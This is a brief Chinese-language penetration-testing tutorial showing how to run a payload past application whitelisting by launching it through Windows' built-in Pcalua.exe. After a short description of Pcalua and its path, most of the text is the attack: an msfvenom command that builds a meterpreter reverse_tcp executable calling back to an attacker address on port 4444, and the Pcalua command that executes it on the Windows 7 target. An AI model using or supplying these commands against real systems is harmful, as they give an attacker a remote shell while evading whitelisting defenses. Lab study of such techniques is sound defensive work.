渗透测试-基于白名单执行payload--Pcalua
渗透测试-基于白名单执行payload--Pcalua
0x01 Pcalua简介
Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。
说明:Pcalua.exe所在路径已被系统添加PATH环境变量中,因此,Pcalua命令可识别
Windows 7 默认位置:
C:\Windows\System32\pcalua.exe
0x02 复现
攻击机: Kali
靶机:Win 7
Msf配置:
生成木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.190.141 LPORT=4444 -f exe > shell.exe
靶机执行:
Pcalua -m -a C:\Users\Administrator\Desktop\Pcalua\shell.exe